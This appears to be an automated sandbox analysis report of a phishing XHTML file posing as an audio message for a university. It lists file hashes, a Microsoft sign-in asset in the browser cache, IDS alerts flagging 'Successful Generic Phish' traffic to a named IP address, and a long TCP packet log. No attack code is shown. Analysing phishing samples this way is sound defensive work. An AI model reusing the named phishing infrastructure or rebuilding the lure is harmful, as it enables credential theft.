Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 121

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	downloaded
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Static File Info

General

File type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Entropy (8bit):	4.788408117412994
TrID:	HyperText Markup Language (15004/1) 83.32% Text - UTF-8 encoded (3003/1) 16.68%
File name:	#Ud83d#Udd0aAudio_Msg Umanitoba.xhtml
File size:	2'920 bytes
MD5:	795e2df43fc14a36ab6394e900f044eb
SHA1:	272b43f3317c2c3fc6355462a9d0e506577f6c0f
SHA256:	d7381bc5ae851624b52c34a4a4d83a8b5c35a51ca203f4758463506807550007
SHA512:	147a24626385a6591ca2ba714febe6f3d9aaa61957ccb2c214f4292e3742729a6c77efd48f61c362be7b12c86efcfb5ba14de25fa0e9b28d811259eafa4b52b9
SSDEEP:	48:3VmIAqy8MF2QD7wPRvlAXdp6DrFjlTSAoz+Rk:VAbh0Idp4FEAw
TLSH:	3351875C5D83C69014B58262EBF7E20CFF63014F12019904B9DEF6832F76F8544ABAE8
File Content Preview:	...<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN".. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" lang="en">..<head>.. <meta http-

Static OLE Info

General

Document Type:	Text
Number of OLE Files:	1

OLE File "#Ud83d#Udd0aAudio_Msg Umanitoba.xhtml"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-24T21:30:15.915969+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.5	49754	104.168.138.190	443	TCP
2025-03-24T21:30:38.046572+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.5	49761	104.168.138.190	443	TCP
2025-03-24T21:30:52.005983+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.5	49773	104.168.138.190	443	TCP
2025-03-24T21:31:06.627986+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.5	49779	104.168.138.190	443	TCP
2025-03-24T21:31:18.570042+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.5	49784	104.168.138.190	443	TCP
2025-03-24T21:32:09.037829+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.5	49790	104.168.138.190	443	TCP
2025-03-24T21:32:17.781701+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.5	49795	104.168.138.190	443	TCP

Network Port Distribution

Total Packets: 528
• 8248 undefined
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2025 21:29:21.991220951 CET	49676	443	192.168.2.5	20.189.173.14
Mar 24, 2025 21:29:22.296483040 CET	49676	443	192.168.2.5	20.189.173.14
Mar 24, 2025 21:29:22.905936003 CET	49676	443	192.168.2.5	20.189.173.14
Mar 24, 2025 21:29:22.941201925 CET	49672	443	192.168.2.5	204.79.197.203
Mar 24, 2025 21:29:24.108990908 CET	49676	443	192.168.2.5	20.189.173.14
Mar 24, 2025 21:29:26.515280962 CET	49676	443	192.168.2.5	20.189.173.14
Mar 24, 2025 21:29:29.006272078 CET	49709	443	192.168.2.5	23.33.40.154
Mar 24, 2025 21:29:29.006515980 CET	49710	443	192.168.2.5	23.33.40.154
Mar 24, 2025 21:29:29.007076979 CET	49715	80	192.168.2.5	23.203.176.221
Mar 24, 2025 21:29:31.321723938 CET	49676	443	192.168.2.5	20.189.173.14
Mar 24, 2025 21:29:32.546988964 CET	49672	443	192.168.2.5	204.79.197.203
Mar 24, 2025 21:29:32.612219095 CET	49729	443	192.168.2.5	142.251.40.132
Mar 24, 2025 21:29:32.612268925 CET	443	49729	142.251.40.132	192.168.2.5
Mar 24, 2025 21:29:32.612333059 CET	49729	443	192.168.2.5	142.251.40.132
Mar 24, 2025 21:29:32.612525940 CET	49729	443	192.168.2.5	142.251.40.132
Mar 24, 2025 21:29:32.612539053 CET	443	49729	142.251.40.132	192.168.2.5
Mar 24, 2025 21:29:32.838896036 CET	443	49729	142.251.40.132	192.168.2.5
Mar 24, 2025 21:29:32.838989019 CET	49729	443	192.168.2.5	142.251.40.132
Mar 24, 2025 21:29:32.840392113 CET	49729	443	192.168.2.5	142.251.40.132
Mar 24, 2025 21:29:32.840404034 CET	443	49729	142.251.40.132	192.168.2.5
Mar 24, 2025 21:29:32.840823889 CET	443	49729	142.251.40.132	192.168.2.5
Mar 24, 2025 21:29:32.890818119 CET	49729	443	192.168.2.5	142.251.40.132
Mar 24, 2025 21:29:34.538595915 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:34.538654089 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:34.538712025 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:34.539108992 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:34.539128065 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:34.989561081 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:34.989653111 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:34.990600109 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:34.990614891 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:34.991096973 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:34.991561890 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.036319971 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.627367020 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.627402067 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.627420902 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.627492905 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.627546072 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.627578020 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.627604008 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.627614021 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.627643108 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.627662897 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.627679110 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.627696037 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.627702951 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.627724886 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.627748013 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.842047930 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.842083931 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.842124939 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.842140913 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.842170000 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.842189074 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.842680931 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.842703104 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.842747927 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.842773914 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.842780113 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.842792034 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.842830896 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:35.842849016 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.842876911 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.844197035 CET	49731	443	192.168.2.5	139.28.36.38
Mar 24, 2025 21:29:35.844208002 CET	443	49731	139.28.36.38	192.168.2.5
Mar 24, 2025 21:29:36.217293978 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:36.217348099 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:36.217421055 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:36.220854044 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:36.220868111 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:36.562561989 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:36.562638044 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:36.563580036 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:36.563591957 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:36.564068079 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:36.564349890 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:36.608330965 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.047652960 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.047719955 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.047765970 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.047827959 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.047828913 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.047863007 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.047914028 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.047951937 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.047996044 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.048019886 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.048027039 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.048058033 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.048079014 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.208755970 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.208815098 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.208861113 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.208890915 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.208909035 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.208926916 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.210366011 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.210413933 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.210447073 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.210454941 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.210469961 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.210546970 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.210709095 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.210755110 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.210802078 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.210802078 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.210810900 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.210856915 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.252410889 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.252471924 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.252511024 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.252523899 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.252547979 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.252559900 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.371467113 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.371541023 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.371603966 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.371603966 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.371635914 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.371736050 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.373560905 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.373606920 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.373636961 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.373642921 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.373692036 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.373692036 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.374159098 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.374202013 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.374255896 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.374255896 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.374269009 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.374305010 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.374542952 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.374583006 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.374638081 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.374638081 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.374645948 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.374852896 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.375096083 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.375137091 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.375165939 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.375171900 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.375294924 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.375297070 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.375324965 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.375365019 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.375365019 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.375374079 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.375397921 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.375417948 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.375439882 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.415219069 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.415277004 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.415327072 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.415342093 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.415395021 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.415395021 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.535831928 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.535890102 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.535950899 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.535950899 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.535983086 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.536000013 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.536060095 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.536063910 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.536087990 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.536147118 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.536147118 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.538219929 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.538263083 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.538292885 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.538302898 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.538338900 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.538338900 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.538350105 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.538429022 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:37.538480043 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.538785934 CET	49732	443	192.168.2.5	185.174.100.20
Mar 24, 2025 21:29:37.538805008 CET	443	49732	185.174.100.20	192.168.2.5
Mar 24, 2025 21:29:38.860757113 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:38.860790014 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:38.860840082 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:38.860965967 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:38.860975981 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.072026968 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.072097063 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.073100090 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.073107004 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.073498964 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.073786974 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.120326996 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.259025097 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.259212971 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.259257078 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.259274006 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.259373903 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.259414911 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.259419918 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.259562969 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.259608030 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.259613037 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.263113976 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.263161898 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.263166904 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.266323090 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.266371965 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.266376972 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.269809961 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.269866943 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.269872904 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.294883966 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.294941902 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.294960022 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.294967890 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.295001984 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.295026064 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.368354082 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.368407011 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.368432045 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.368441105 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.368477106 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.382198095 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.382220984 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.382261038 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.382268906 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.382302999 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.382312059 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.394289017 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.394304991 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.394344091 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.394350052 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.394380093 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.394392014 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.397439003 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.397496939 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.397502899 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.397514105 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.397562981 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.403887033 CET	49735	443	192.168.2.5	151.101.66.137
Mar 24, 2025 21:29:39.403906107 CET	443	49735	151.101.66.137	192.168.2.5
Mar 24, 2025 21:29:39.591161966 CET	49738	443	192.168.2.5	199.232.196.193
Mar 24, 2025 21:29:39.591171980 CET	443	49738	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:39.591223955 CET	49738	443	192.168.2.5	199.232.196.193
Mar 24, 2025 21:29:39.591412067 CET	49739	443	192.168.2.5	199.232.196.193
Mar 24, 2025 21:29:39.591423035 CET	443	49739	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:39.591471910 CET	49739	443	192.168.2.5	199.232.196.193
Mar 24, 2025 21:29:39.591753006 CET	49738	443	192.168.2.5	199.232.196.193
Mar 24, 2025 21:29:39.591763973 CET	443	49738	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:39.591835976 CET	49739	443	192.168.2.5	199.232.196.193
Mar 24, 2025 21:29:39.591845989 CET	443	49739	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:39.908565044 CET	443	49739	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:39.908584118 CET	443	49738	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:39.908644915 CET	49739	443	192.168.2.5	199.232.196.193
Mar 24, 2025 21:29:39.908654928 CET	49738	443	192.168.2.5	199.232.196.193
Mar 24, 2025 21:29:39.909780979 CET	49739	443	192.168.2.5	199.232.196.193
Mar 24, 2025 21:29:39.909785032 CET	443	49739	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:39.909787893 CET	49738	443	192.168.2.5	199.232.196.193
Mar 24, 2025 21:29:39.909812927 CET	443	49738	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:39.910300970 CET	443	49739	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:39.910341024 CET	443	49738	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:39.910516977 CET	49739	443	192.168.2.5	199.232.196.193
Mar 24, 2025 21:29:39.910643101 CET	49738	443	192.168.2.5	199.232.196.193
Mar 24, 2025 21:29:39.956325054 CET	443	49739	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:39.956352949 CET	443	49738	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:40.015259981 CET	443	49739	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:40.015285969 CET	443	49738	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:40.015351057 CET	443	49739	199.232.196.193	192.168.2.5
Mar 24, 2025 21:29:40.015410900 CET	443	49739	199.232.196.193	192.168.2.5
